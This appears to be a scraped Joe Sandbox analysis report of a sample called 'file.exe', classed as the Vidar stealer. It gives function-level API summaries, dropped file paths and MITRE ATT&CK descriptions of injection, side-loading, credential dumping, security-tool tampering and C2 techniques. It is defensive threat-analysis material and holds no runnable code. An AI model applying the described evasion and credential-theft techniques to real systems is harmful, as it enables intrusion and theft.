Opcode Fuzzy Hash: 7a3ad8e5f388b8cf485f5ad108bd2b3d96fd8dc5472cdbd1b333582aabfa4162
Instruction Fuzzy Hash: CCF0CD71A00282CFEB00EF98EA55B823371B30730DF21CAD8C5040BB41E7B5A55ACA82

Uniqueness

Uniqueness Score: -1.00%

Function 6CBDBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6CBDBEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CBDBEF5

Strings

cryptbase.dll, xrefs: 6CBDBEF0

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 8cde3a104228d9a1e325661d73df71d4e1fd46163ac88ce9dbb106b3eb575255
Instruction ID: 4973c046af8b3913769da5df3646cad273a83f4a8889a9a9a2ac42438425f3b3
Opcode Fuzzy Hash: 8cde3a104228d9a1e325661d73df71d4e1fd46163ac88ce9dbb106b3eb575255
Instruction Fuzzy Hash: 7AD0A932284A08EBCA00BAA08C0AF293BB8A702329F20C420F30984891C7B0A410CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6CC008F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC4E7DC), ref: 6CC00918
LeaveCriticalSection.KERNEL32(6CC4E7DC), ref: 6CC009A6
EnterCriticalSection.KERNEL32(6CC4E7DC,?,00000000), ref: 6CC009F3
LeaveCriticalSection.KERNEL32(6CC4E7DC), ref: 6CC00ACB

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: c4d17493828c061421f5654b0c555f1f3a225dc2ba1f296404cdd1766de8730b
Instruction ID: 7cb10b12b4df51a63bc3743e3b8a5648261fc986b482445ad510ad1eb05c3d8d
Opcode Fuzzy Hash: c4d17493828c061421f5654b0c555f1f3a225dc2ba1f296404cdd1766de8730b
Instruction Fuzzy Hash: 1B511A367019548FEB04EF59C411B6A73B5EB82B38B27C13ED96597F80E732E84186D1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC1B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CC1B2C9,?,?,?,6CC1B127,?,?,?,?,?,?,?,?,?,6CC1AE52), ref: 6CC1B628

Part of subcall function 6CC190E0: free.MOZGLUE(?,00000000,?,?,6CC1DEDB), ref: 6CC190FF
Part of subcall function 6CC190E0: free.MOZGLUE(?,00000000,?,?,6CC1DEDB), ref: 6CC19108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC1B2C9,?,?,?,6CC1B127,?,?,?,?,?,?,?,?,?,6CC1AE52), ref: 6CC1B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC1B2C9,?,?,?,6CC1B127,?,?,?,?,?,?,?,?,?,6CC1AE52), ref: 6CC1B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CC1B127,?,?,?,?,?,?,?,?), ref: 6CC1B74D

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: a7e31d3a90234567324e1b7be74e7322411aeebeb0971450b4d873a0da612f46
Instruction ID: 2300b0027af688f6ac0b68e73b3f39d69be3b0252883d77f24dd7f024f14bfe9
Opcode Fuzzy Hash: a7e31d3a90234567324e1b7be74e7322411aeebeb0971450b4d873a0da612f46
Instruction Fuzzy Hash: 1E51D2B1A092168FDB14CF1AC9A075EB7B1FF85304F05856DC85AABB10E731E805CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC1DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC0FF2A), ref: 6CC1DFFD

Part of subcall function 6CC190E0: free.MOZGLUE(?,00000000,?,?,6CC1DEDB), ref: 6CC190FF
Part of subcall function 6CC190E0: free.MOZGLUE(?,00000000,?,?,6CC1DEDB), ref: 6CC19108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC0FF2A), ref: 6CC1E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC0FF2A), ref: 6CC1E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC0FF2A), ref: 6CC1E0FE

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 7610641d3f8b3a9044ceaf036e46a0018c7dd2b5dec99f901ea882cc418d6232
Instruction ID: ee1c858c91a99d800b9bf48f759cf59f28a45e7bdc8cdc39e31d80f2f8f6e146
Opcode Fuzzy Hash: 7610641d3f8b3a9044ceaf036e46a0018c7dd2b5dec99f901ea882cc418d6232
Instruction Fuzzy Hash: 5C41D4B16082168FEB14CF6AC88435A77B2BB46308F25453DD516DBF40F732E906EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CC16E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CC16EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CC16EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC16F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC16F5C

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: fb4a8d6928eca4e84278d0d420dc47bbbd23eac710328c9db869425616b20dfe
Instruction ID: c390ef72ec15d357ffb088da97ba0ec4d5f6014cabbfd641a407f45e9c64c4fc
Opcode Fuzzy Hash: fb4a8d6928eca4e84278d0d420dc47bbbd23eac710328c9db869425616b20dfe
Instruction Fuzzy Hash: DB31E471A14A0A8FDB04CF2DC9807AA73F9EF85304F50823AD41AC7A61FB31E659D790

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CBD0A4D), ref: 6CC2B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CBD0A4D), ref: 6CC2B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CBD0A4D), ref: 6CC2B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CBD0A4D), ref: 6CC2B67F

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 7eecd011bad685a7498054da26b3207aab13f6954615dc00f4b5070f75f0bf94
Instruction ID: 8f8df86bd4418bf86801d774c306a1cc483bfde197c2a6e2999d46fb8833e108
Opcode Fuzzy Hash: 7eecd011bad685a7498054da26b3207aab13f6954615dc00f4b5070f75f0bf94
Instruction Fuzzy Hash: 863104B1A006168FDB14DF58C854A5ABBF6FF80305F16C62AC8179B311EB36E915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CDA0DF5
TlsGetValue.KERNEL32 ref: 6CDA0E2D
TlsGetValue.KERNEL32 ref: 6CDA0E58
TlsGetValue.KERNEL32 ref: 6CDA0E84

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: ecff4778ef9e5f4d267b028ab8949dddbca1056320f11d1230dcdf64e2f164eb
Instruction ID: 7b886a1399aa611c6656ff051531093766b77a9b2e47520a32713ceaf31caa9e
Opcode Fuzzy Hash: ecff4778ef9e5f4d267b028ab8949dddbca1056320f11d1230dcdf64e2f164eb
Instruction Fuzzy Hash: 9731E6B1B44390CFDB006FB8C5842597BB4BF0A389F014629D89AC7A31DB35E586DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CBFF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6CBFF611
memcpy.VCRUNTIME140(?,?,?), ref: 6CBFF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6CBFF652
memcpy.VCRUNTIME140(?,?,?), ref: 6CBFF668

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 683dd0be1e35e95d2d343bd73d60506a703ddf0a7bfa7fb791bfbc7e8907c87f
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 99313E71A00224AFCB14CF69DCC0A9E77F5EB84354B148539EA598BB04E631ED49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CC126B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC126C1
free.MOZGLUE(?), ref: 6CC126E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC126FF
free.MOZGLUE ref: 6CC1270D

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3ba2d4c3a624d0fff13b8363e66766ec04a6b02dd4b0f8b4ed002a52d3c36079
Instruction ID: 8c1a757c2d146d3c18a94477d710e64ff1643f37702c3cc3cefba0c40ec9a0b1
Opcode Fuzzy Hash: 3ba2d4c3a624d0fff13b8363e66766ec04a6b02dd4b0f8b4ed002a52d3c36079
Instruction Fuzzy Hash: A0F0F4B67052405BE7109A19E888A5BB3A9EF5635CB144035EA1AC3F02F332F919D6A6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AECAKJJECAEGCBGDHDHCFCFHJD

C:\ProgramData\AFCFHDHIIIECBGCAKFIJDHJEGI

C:\ProgramData\BAEBGHCFCAAFIECAFIIIDBAFII

C:\ProgramData\CGDHIEGC

C:\ProgramData\ECAEGHIJEHJDHIDHIDAE

C:\ProgramData\GCAFCAFH

C:\ProgramData\HDAFBAEBKJKFIDHJJKJKKFBAFB

C:\ProgramData\HIDBFCBG

C:\ProgramData\IJEHIDHDAKJDHJKEBFIE

C:\ProgramData\KFCGDBAK

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_46295dc254ed0112f7af36e8d4fb4383967ee_a4c4a70a_16ba7210-c1f9-4ac0-8547-e3f2990a2e8f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DCE.tmp.dmp

Windows Analysis Report
file.exe

Function 0331211D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Function 014D0EEF Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 566
COMMON

Function 014D1708 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre